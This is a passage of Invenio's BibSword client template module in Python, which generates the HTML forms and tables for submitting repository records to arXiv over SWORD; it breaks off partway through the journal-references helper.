"content": "<|memory_start|>```python\n# -*- coding: utf-8 -*-\n\n## This file is part of Invenio.\n## Copyright (C) 2010 CERN.\n##\n## Invenio is free software; you can redistribute it and/or\n## modify it under the terms of the GNU General Public License as\n## published by the Free Software Foundation; either version 2 of the\n## License, or (at your option) any later version.\n##\n## Invenio is distributed in the hope that it will be useful, but\n## WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n## General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with Invenio; if not, write to the Free Software Foundation, Inc.,\n## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n\n'''\nBibSWORD Client Templates\n'''\n\nfrom invenio.config import CFG_SITE_URL\n\nclass BibSwordTemplate:\n '''\n This class contains attributes and methods that allows to display all\n information used by the BibSword web user interface. Theses informations\n are formular, validation or error messages\n '''\n\n def __init__(self):\n ''' No init necessary for this class '''\n\n #---------------------------------------------------------------------------\n # BibSword WebSubmit Interface\n #---------------------------------------------------------------------------\n\n def tmpl_display_submit_ack(self, remote_id, link):\n '''\n This method generate the html code that displays the acknoledgement\n message after the submission of a record.\n @param (remote_id) : id of the record given by arXiv\n @param (links) : links to modify or consult submission\n @return : string containing the html code\n '''\n\n html = ''\n\n html += '''<h1>Success !</h1>'''\n html += '''<p>The record has been successfully pushed to arXiv ! <br />''' \\\n '''You will get an email once it will be accepted by ''' \\\n '''arXiv moderator.</p>'''\n html += '''<p>The arXiv id of the submission is : <b>%s</b></p>''' % \\\n remote_id\n html += '''<p><a href=\"www.arxiv.org/user\">Manage your submission</a></p>'''\n\n return html\n\n #---------------------------------------------------------------------------\n # BibSword Administrator Interface\n #---------------------------------------------------------------------------\n\n def tmpl_display_admin_page(self, submissions, first_row, last_row,\n total_rows, is_prev, is_last, offset,\n error_messages=None) :\n '''\n format the html code that display the submission table\n @param (submissions) : list of all submissions and their status\n @return : html code to be displayed\n '''\n\n if error_messages == None :\n error_messages = []\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n %(error_message)s\n\n <input type=\"hidden\" name=\"status\" value=\"display_submission\"/>\n <input type=\"hidden\" name=\"first_row\" value=\"%(first_row)s\"/>\n <input type=\"hidden\" name=\"last_row\" value=\"%(last_row)s\"/>\n <input type=\"hidden\" name=\"total_rows\" value=\"%(total_rows)s\" />\n\n <input type=\"submit\" name=\"submit\" value=\"New submission\"/><br/>\n <br />\n <input type=\"submit\" name=\"submit\" value=\"Refresh all\"/><br/>\n <br />\n Display\n <select name=\"offset\">\n <option value=\"5\" %(selected_1)s>5</option>\n <option value=\"10\" %(selected_2)s>10</option>\n <option value=\"25\" %(selected_3)s>25</option>\n <option value=\"50\" %(selected_4)s>50</option>\n <option value=%(total_rows)s %(selected_5)s>all</option>\n </select>\n rows per page <input type=\"submit\" name=\"submit\" value=\"Select\" /><br />\n <br />\n <input type=\"submit\" name=\"submit\" value=\"First\" %(is_prev)s/>\n <input type=\"submit\" name=\"submit\" value=\"Prev\" %(is_prev)s/>\n Pages %(first_row)s - %(last_row)s / %(total_rows)s\n <input type=\"submit\" name=\"submit\" value=\"Next\" %(is_last)s/>\n <input type=\"submit\" name=\"submit\" value=\"Last\" %(is_last)s/><br/>\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"7\" bgcolor=\"#e6e6fa\">\n <h2>Submission state</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote server</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Submitter</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Record number</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote id</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Status</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Dates</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Links</b></td>\n </tr>\n %(submissions)s\n </table>\n</form>''' % {\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n 'table_width' : '100%',\n 'first_row' : first_row,\n 'last_row' : last_row,\n 'total_rows' : total_rows,\n 'is_prev' : is_prev,\n 'is_last' : is_last,\n 'selected_1' : offset[0],\n 'selected_2' : offset[1],\n 'selected_3' : offset[2],\n 'selected_4' : offset[3],\n 'selected_5' : offset[4],\n 'submissions' : self.fill_submission_table(submissions)\n }\n\n return body\n\n\n def tmpl_display_remote_server_info(self, server_info) :\n '''\n Display a table containing all server informations\n @param (server_info) : tuple containing all server infos\n @return : html code for the table containing infos\n '''\n\n body = '''<table width=\"%(table_width)s\">\\n''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">ID</td>\\n''' \\\n ''' <td>%(server_id)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Name</td>\\n''' \\\n ''' <td>%(server_name)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Host</td>\\n''' \\\n ''' <td>%(server_host)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Username</td>\\n''' \\\n ''' <td>%(username)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Password</td>\\n''' \\\n ''' <td>%(password)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Email</td>\\n''' \\\n ''' <td>%(email)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Realm</td>\\n''' \\\n ''' <td>%(realm)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Record URL</td>\\n''' \\\n ''' <td>%(url_base_record)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">URL Servicedocument</td>\\n'''\\\n ''' <td>%(url_servicedocument)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n '''</table>''' % {\n 'table_width' : '50%',\n 'server_id' : server_info['server_id'],\n 'server_name' : server_info['server_name'],\n 'server_host' : server_info['server_host'],\n 'username' : server_info['username'],\n 'password' : server_info['password'],\n 'email' : server_info['email'],\n 'realm' : server_info['realm'],\n 'url_base_record' : server_info['url_base_record'],\n 'url_servicedocument' : server_info['url_servicedocument']\n }\n\n return body\n\n\n def tmpl_display_remote_servers(self, remote_servers, id_record,\n error_messages):\n '''\n format the html code that display a dropdown list containing the\n servers\n @param (self) : reference to the current instance of the class\n @param (remote_servers) : list of tuple containing server's infos\n @return : string containing html code\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"select_server\"/>\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Forward a record</h2>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Enter the number of the repord to submit : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <input type=\"text\" name=\"id_record\" size=\"20\"\n value=\"%(id_record)s\"/>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Select a remote server : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_remote_server\" size=\"1\">\n <option value=\"0\">-- select a remote server --</option>\n %(remote_server)s\n </select>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" align=\"center\">\n <input type=\"submit\" value=\"Select\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n</form>''' % {\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n 'table_width' : '100%',\n 'row_width' : '50%',\n 'id_record' : id_record,\n 'remote_server' : \\\n self.fill_dropdown_remote_servers(remote_servers)\n }\n\n return body\n\n\n def tmpl_display_collections(self, selected_server, server_infos,\n collections, id_record, recid, error_messages):\n '''\n format the html code that display the selected server, the informations\n about the selected server and a dropdown list containing the server's\n collections\n @param (self) : reference to the current instance of the class\n @param (selected_server) : tuple containing selected server name and id\n @param (server_infos) : tuple containing infos about selected server\n @param (collections) : list contianing server's collections\n @param (remote_servers) : list of tuple containing server's infos\n @return : string containing html code\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"select_collection\"/>\n <input type=\"hidden\" name=\"id_remote_server\" value=\"%(id_server)s\"/>\n <input type=\"hidden\" name=\"id_record\" value=\"%(id_record)s\"/>\n <input type=\"hidden\" name=\"recid\" value=\"%(recid)s\"/>\n\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Remote server</h2></td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"2\" valign=\"center\">\n <h2>%(server_name)s</h2>\n </td>\n <td align=\"left\">\n SWORD version : %(server_version)s\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Max upload size [Kb] : %(server_maxUpload)s\n </td>\n </tr>\n <tr>\n <td align=\"left\" colspan=\"2\">\n <input type=\"submit\" value=\"Modify server\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\"><h2>Collection</h2>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">Select a collection : </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_collection\" size=\"1\">\n <option value=\"0\">-- select a collection --</option>\n %(collection)s\n </select>\n </td>\n </tr>\n <tr>\n <td align=\"center\" colspan=\"2\">\n <input type=\"submit\" value=\"Select\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n\n</form>''' % {\n 'table_width' : '100%',\n 'row_width' : '50%',\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n 'id_server' : selected_server['id'],\n 'server_name' : selected_server['name'],\n 'server_version' : server_infos['version'],\n 'server_maxUpload' : server_infos['maxUploadSize'],\n 'collection' : \\\n self.fill_dropdown_collections(collections),\n 'id_record' : id_record,\n 'recid' : recid\n }\n\n return body\n\n\n def tmpl_display_categories(self, selected_server, server_infos,\n selected_collection, collection_infos,\n primary_categories, secondary_categories,\n id_record, recid, error_messages):\n '''\n format the html code that display the selected server, the informations\n about the selected server, the selected collections, the informations\n about the collection and a dropdown list containing the server's\n primary and secondary categories\n @param (self) : reference to the current instance of the class\n @param (selected_server) : tuple containing selected server name and id\n @param (server_infos) : tuple containing infos about selected server\n @param (collections) : tuple containing selected collection\n @param (collection_infos) : tuple containing infos about selected col\n @param (primary_categories) : list of mandated categories for the col\n @param (remote_servers) : list of optional categories for the col\n @return : string containing html code\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"select_primary_category\"/>\n <input type=\"hidden\" name=\"id_remote_server\" value=\"%(id_server)s\"/>\n <input type=\"hidden\" name=\"id_collection\" value=\"%(id_collection)s\"/>\n <input type=\"hidden\" name=\"id_record\" value=\"%(id_record)s\"/>\n <input type=\"hidden\" name=\"recid\" value=\"%(recid)s\"/>\n\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Remote server</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"2\" valign=\"center\">\n <h2>%(server_name)s</h2>\n </td>\n <td align=\"left\">\n SWORD version : %(server_version)s\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Max upload size [Kb] : %(server_maxUpload)s\n </td>\n </tr>\n <tr>\n <td align=\"left\" colspan=\"2\">\n <input type=\"submit\" value=\"Modify server\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Collection</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"2\" valign=\"center\">\n <h2>%(collection_name)s</h2>\n </td>\n <td align=\"left\">\n URL : %(collection_url)s\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Accepted media types:\n <ul>%(collection_accept)s</ul>\n </td>\n </tr>\n <tr>\n <td align=\"left\" colspan=2>\n <input type=\"submit\" value=\"Modify collection\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Mandatory category</h2>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Select a mandated category : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_primary\" size=\"1\">\n <option value=\"0\">-- select a category --</option>\n %(primary_categories)s\n </select>\n </td>\n </tr>\n </table>\n <p></p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Optional categories</h2>\n </td>\n </tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Select optional categories : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_categories\" size=\"10\" multiple>\n %(secondary_categories)s\n </select>\n </td>\n </tr>\n </table>\n <p> </p>\n\n <center>\n <input type=\"submit\" value=\"Select\" name=\"submit\"/>\n </center>\n\n</form>''' % {\n 'table_width' : '100%',\n 'row_width' : '50%',\n 'error_message' : self.display_error_message_row(\n error_messages),\n\n # hidden input\n 'id_server' : selected_server['id'],\n 'id_collection' : selected_collection['id'],\n 'id_record' : id_record,\n 'recid' : recid,\n\n # variables values\n 'server_name' : selected_server['name'],\n 'server_version' : server_infos['version'],\n 'server_maxUpload' : server_infos['maxUploadSize'],\n\n 'collection_name' : selected_collection['label'],\n\n 'collection_accept' : ''.join([\n '''<li>%(name)s </li>''' % {\n 'name' : accept\n } for accept in collection_infos['accept'] ]),\n\n 'collection_url' : selected_collection['url'],\n 'primary_categories' : self.fill_dropdown_primary(\n primary_categories),\n\n 'secondary_categories': self.fill_dropdown_secondary(\n secondary_categories)\n }\n\n return body\n\n\n def tmpl_display_metadata(self, user, server, collection, primary,\n categories, medias, metadata, id_record, recid,\n error_messages):\n '''\n format a string containing every informations before a submission\n '''\n\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"check_submission\"/>\n <input type=\"hidden\" name=\"id_remote_server\" value=\"%(id_server)s\"/>\n <input type=\"hidden\" name=\"id_collection\" value=\"%(id_collection)s\"/>\n <input type=\"hidden\" name=\"id_primary\" value=\"%(id_primary)s\"/>\n <input type=\"hidden\" name=\"id_categories\" value=\"%(id_categories)s\"/>\n <input type=\"hidden\" name=\"id_record\" value=\"%(id_record)s\"/>\n <input type=\"hidden\" name=\"recid\" value=\"%(recid)s\"/>\n\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Destination</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"3\" valign=\"center\">\n <h2>%(server_name)s</h2>\n </td>\n <td align=\"left\">\n Collection : %(collection_name)s ( %(collection_url)s )\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Primary category : %(primary_name)s ( %(primary_url)s )\n </td>\n </tr>\n%(categories)s\n <tr>\n <td align=\"left\" colspan=\"2\">\n <input type=\"submit\" value=\"Modify destination\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"4\" bgcolor=\"#e6e6fa\">\n <h2>Submitter</h2>\n </td>\n </tr>\n <tr>\n <td width=\"%(row_width)s\">Name :</td>\n <td><input type=\"text\" name=\"author_name\" size=\"100\"\n value=\"%(user_name)s\"/></td>\n </tr>\n <tr>\n <td>Email :</td>\n <td><input type=\"text\" name=\"author_email\" size=\"100\"\n value=\"%(user_email)s\"/></td>\n </tr>\n </table>\n <p></p>\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"4\" bgcolor=\"#e6e6fa\"><h2>Media</h2></td>\n </tr>\n <tr><td colspan=\"4\">%(medias)s%(media_help)s</td></tr>\n </table>\n <p></p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"3\" bgcolor=\"#e6e6fa\"><h2>Metadata</h2> <font color=\"red\"><b>Warning :</b> modification(s) will not be saved on Invenio</font>\n </td>\n </tr>\n <tr>\n <td align=\"left\" width=\"%(row_width)s\"><p>Id* :</p></td>\n <td><input type=\"text\" name=\"id\" size=\"100\" value=\"%(id)s\"/></td>\n </tr>\n <tr>\n <td align=\"left\" width=\"%(row_width)s\"><p>Title* :</p></td>\n <td><input type=\"text\" name=\"title\" size=\"100\" value=\"%(title)s\"/>\n </td>\n </tr>\n <tr>\n <td align=\"left\" width=\"%(row_width)s\"><p>Summary* :</p></td>\n <td>\n <textarea name=\"summary\" rows=\"4\" cols=\"100\">%(summary)s\n </textarea>\n </td>\n </tr>\n%(contributors)s\n%(journal_refs)s\n%(report_nos)s\n </table>\n\n <p><font color=\"red\">The fields having a * are mandatory</font></p>\n\n <center>\n <input type=\"submit\" value=\"Submit\" name=\"submit\"/>\n </center>\n\n<form>''' % {\n 'table_width' : '100%',\n 'row_width' : '25%',\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n\n # hidden input\n 'id_server' : server['id'],\n 'id_collection' : collection['id'],\n 'id_primary' : primary['id'],\n 'id_categories' : self.get_list_id_categories(categories),\n 'id_record' : id_record,\n 'recid' : recid,\n\n # variables values\n 'server_name' : server['name'],\n 'collection_name' : collection['label'],\n 'collection_url' : collection['url'],\n 'primary_name' : primary['label'],\n 'primary_url' : primary['url'],\n 'categories' : self.fill_optional_category_list(categories),\n\n #user\n 'user_name' : user['nickname'],\n 'user_email' : user['email'],\n\n # media\n 'medias' : self.fill_media_list(medias, server['id']),\n 'media_help' : self.fill_arxiv_help_message(),\n\n # metadata\n 'id' : metadata['id'],\n 'title' : metadata['title'],\n 'summary' : metadata['summary'],\n 'contributors' : self.fill_contributors_list(\n metadata['contributors']),\n 'journal_refs' : self.fill_journal_refs_list(\n metadata['journal_refs']),\n 'report_nos' : self.fill_report_nos_list(\n metadata['report_nos'])\n }\n\n return body\n\n\n def tmpl_display_list_submission(self, submissions):\n '''\n Display the data of submitted recods\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"7\" bgcolor=\"#e6e6fa\">\n <h2>Document successfully submitted !</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote server</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Submitter</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Record id</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote id</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Status</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Dates</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Links</b></td>\n </tr>\n %(submissions)s\n </table>\n <a href=%(CFG_SITE_URL)s/bibsword>Return</a>\n</form>''' % {\n 'table_width' : '100%',\n 'submissions' : self.fill_submission_table(submissions),\n 'CFG_SITE_URL' : CFG_SITE_URL\n }\n\n return body\n\n\n #***************************************************************************\n # Private functions\n #***************************************************************************\n\n\n def display_error_message_row(self, error_messages):\n '''\n return a list of error_message in form of a bullet list\n @param (error_messages) : list of error_messages to display\n @return : html code that display list of errors\n '''\n\n # if no errors, return nothing\n if len(error_messages) == 0:\n return ''\n\n if len(error_messages) == 1:\n # display a generic header message\n body = '''\n<tr>\n <td align=\"left\" colspan=2>\n <font color='red'>\n <p> The following error was found in the formular : </p>\n <ul>\n'''\n\n else :\n # display a generic header message\n body = '''\n<tr>\n <td align=\"left\" colspan=2>\n <font color='red'>\n <p> Following errors were found in the formular : </p>\n <ul>\n'''\n\n # insert each error lines\n for error_message in error_messages :\n body = body + '''\n <li>%(error)s</li>''' % {\n 'error' : error_message\n }\n\n body = body + '''\n </ul>\n </font>\n </td>\n</tr>'''\n\n return body\n\n\n def fill_submission_table(self, submissions) :\n '''\n This method return the body of the submission state table. each\n submissions given in parameters has one row\n @param (submissions) : submission status list\n @return: html table body\n '''\n\n return ''.join([\n ''' <tr>\n <td>%(id_server)s : <a href=\"%(server_infos)s\">\n %(server_name)s</a></td>\n <td>%(user_name)s <br/> %(user_email)s</td\n <td>%(id_bibrec)s : <a href=\"%(cfg_site_url)s/record/%(id_bibrec)s\"\n target=\"_blank\">%(no_bibrec)s</a></td>\n <td><a href=\"%(url_base_remote)s/%(id_remote)s\" target=\"_blank\">\n %(id_remote)s</a></td>\n <td>%(status)s</td>\n <td><b>submission : </b> %(submission_date)s <br/>\n <b>publication : </b> %(publication_date)s <br/>\n <b>removal : </b> %(removal_date)s </td>\n <td><b>media : </b> <a href=\"%(media_link)s\" target=\"_blank\">\n %(media_link)s</a> <br/>\n <b>metadata : </b> <a href=\"%(metadata_link)s\" target=\"_blank\">\n %(metadata_link)s</a> <br />\n <b>status : </b> <a href=\"%(status_link)s\" target=\"_blank\">\n %(status_link)s</a></td>\n </tr>''' % {\n 'id_server' : str(submission['id_server']),\n 'server_infos' : \"%s/bibsword/remoteserverinfos?id=%s\" % \\\n (CFG_SITE_URL, submission['id_server']),\n 'server_name' : str(submission['server_name']),\n 'user_name' : str(submission['user_name']),\n 'user_email' : str(submission['user_email']),\n 'id_bibrec' : str(submission['id_record']),\n 'no_bibrec' : str(submission['report_no']),\n 'id_remote' : str(submission['id_remote']),\n 'status' : str(submission['status']),\n 'submission_date' : str(submission['submission_date']),\n 'publication_date' : str(submission['publication_date']),\n 'removal_date' : str(submission['removal_date']),\n 'media_link' : str(submission['link_medias']),\n 'metadata_link' : str(submission['link_metadata']),\n 'status_link' : str(submission['link_status']),\n 'url_base_remote' : str(submission['url_base_remote']),\n 'cfg_site_url' : CFG_SITE_URL\n } for submission in submissions])\n\n\n def fill_dropdown_remote_servers(self, remote_servers):\n '''\n This method fill a dropdown list of remote servers.\n @param (collections) : list of all collections with name - url\n @param (selected_col_url) : URL of the selected collection\n @return (html colde) : code html to display\n '''\n\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s - %(host)s</option>''' % {\n 'id' : str(remote_server['id']),\n 'name' : remote_server['name'],\n 'host' : remote_server['host']\n } for remote_server in remote_servers])\n\n\n def fill_dropdown_collections(self, collections):\n '''\n This method fill a dropdown list of collection.\n @param (collections) : list of all collections with name - url\n @param (selected_col_url) : URL of the selected collection\n @return (html colde) : code html to display\n '''\n\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s</option>''' % {\n 'id' : str(collection['id']),\n 'name' : collection['label']\n } for collection in collections])\n\n\n\n def fill_dropdown_primary(self, primary_categories):\n '''\n This method fill the primary dropdown list with the data given in\n parameter\n @param (primary) : list of 'url' 'name' tuples\n @return (body) : html code generated to display the list\n '''\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s</option>''' % {\n 'id' : primary_categorie['id'],\n 'name' : primary_categorie['label']\n } for primary_categorie in primary_categories])\n\n\n def fill_dropdown_secondary(self, categories):\n '''\n This method fill a category list. This list is allows the multi-selection\n or items. To proced to select more than one categorie through a browser\n ctrl + clic\n @param (categories) : list of all categories in the format name - url\n @reutrn (html code) : the html code that display each dropdown list\n '''\n\n if len(categories) == '' :\n return ''\n\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s</option>''' % {\n 'id' : category['id'],\n 'name' : category['label']\n } for category in categories])\n\n\n\n def fill_optional_category_list(self, categories):\n '''\n This method fill a table row that contains name and url of the selected\n optional categories\n @param (self) : reference to the current instance of the class\n @param (categories) : list of tuples containing selected categories\n @return (body) : html code generated to display the list\n '''\n\n if len(categories) == 0 :\n return ''\n\n else :\n body = '<tr><td>'\n\n body = body + ''.join([\n '''<p>Category : %(category_name)s ( %(category_url)s )</p>'''%{\n 'category_name' : category['label'],\n 'category_url' : category['url']\n } for category in categories\n ])\n\n body = body + '</td></tr>'\n return body\n\n\n def fill_media_list(self, medias, id_server, from_websubmit=False):\n '''\n Concatenate the string that contains all informations about the medias\n '''\n\n text = ''\n\n if id_server == 1 :\n\n media_type = self.format_media_list_by_type(medias)\n\n text = '''<h2>Please select files you would like to push to arXiv:</h2>'''\n\n for type in media_type :\n text += '''<h3><b>%s : </b></h3>''' % type['media_type']\n text += '''<blockquote>'''\n for media in type['media_list'] :\n text += '''<input type='checkbox' name=\"media\" value=\"%s\" %s>%s</input><br />''' % (media['path'], media['selected'], media['name'])\n text += \"</blockquote>\"\n\n text += '''<h3>Upload</h3>'''\n text += '''<blockquote>'''\n text += '''<p>In addition, you can submit a new file (that will be added to the record as well):</p>'''\n\n if from_websubmit == False :\n text += '''<input type=\"file\" name=\"new_media\" size=\"60\"/>'''\n return text\n\n\n def fill_arxiv_help_message(self) :\n text = '''</blockquote><h3>Help</h3>'''\n text += '''<blockquote><p>For more help on which formats are supported by arXiv, please see :'''\\\n '''<ul>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit\" target=\"_blank\">'''\\\n '''arXiv submission process</a></li>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit_tex\" target=\"_blank\">'''\\\n '''arXiv TeX submission</a></li>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit_docx\" target=\"_blank\">'''\\\n '''arXiv Docx submission</a></li>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit_pdf\" target=\"_blank\">'''\\\n '''arXiv PDF submission</a></li>'''\\\n '''</ul></blockquote>'''\n return text\n\n\n def fill_contributors_list(self, contributors) :\n '''\n This method display each contributors in the format of an editable input\n text. This allows the user to modifie it.\n @param (contributors) : The list of all contributors of the document\n @return (html code) : the html code that display each dropdown list\n '''\n\n output = ''\n\n is_author = True\n\n for author in contributors :\n\n nb_rows = 2\n\n author_name = \\\n '''<LABEL for=\"name\">Name: </LABEL><input type = \"text\" ''' \\\n '''name = \"contributor_name\" size = \"100\" value = \"%s\" ''' \\\n '''id=\"name\"/>''' % author['name']\n\n author_email = \\\n '''<LABEL for = \"email\">Email: </LABEL>''' \\\n '''<input type = \"text\" name = \"contributor_email\" ''' \\\n '''size = \"100\" value = \"%s\" id = \"email\"/>''' % author['email']\n\n author_affiliations = []\n for affiliation in author['affiliation'] :\n affiliation_row = \\\n '''<LABEL for = \"affiliation\">Affiliation: </LABEL> ''' \\\n '''<input type=\"text\" name = \"contributor_affiliation\" ''' \\\n '''size = \"100\" value = \"%s\" id = \"affiliation\"/>''' % \\\n affiliation\n author_affiliations.append(affiliation_row)\n nb_rows = nb_rows + 1\n affiliation_row = \\\n '''<LABEL for = \"affiliation\">Affiliation: </LABEL>''' \\\n '''<input type = \"text\" name = \"contributor_affiliation\" ''' \\\n '''size = \"100\" id = \"affiliation\"/>'''\n author_affiliations.append(affiliation_row)\n nb_rows = nb_rows + 1\n\n if is_author :\n output += '''<tr><td rowspan = \"%s\">Author : </td>''' % nb_rows\n is_author = False\n else :\n output += '''<tr><td rowspan = \"%s\">Contributor : </td>''' % \\\n nb_rows\n output += '''<td>%s</td></tr>''' % author_name\n if author_email != '':\n output += '''<tr><td>%s</td></tr>''' % author_email\n for affiliation in author_affiliations :\n output += '''<tr><td>%s</td></tr>''' % affiliation\n output += \\\n '''<input type = \"hidden\" name = \"contributor_affiliation\" ''' \\\n '''value = \"next\"/>'''\n\n return output\n\n\n def fill_journal_refs_list(self, journal_refs):\n '''\n This method display each journal references in the format of an editable\n input text. This allows the user to modifie it.\n @param (journal_refs) : The list of all journal references of the document\n @return (html code) : the html code that display each dropdown list\n '''\n\n html = ''\n\n if len(journal_refs) > 0:\n\n html += '''\n <tr>\n <td align=\"left\"><p>Journal references : </p></td><td>\n '''\n\n html = html + ''.join([\n '''\n <p><input type=\"text\" name=\"journal_refs\" size=\"100\" ''' 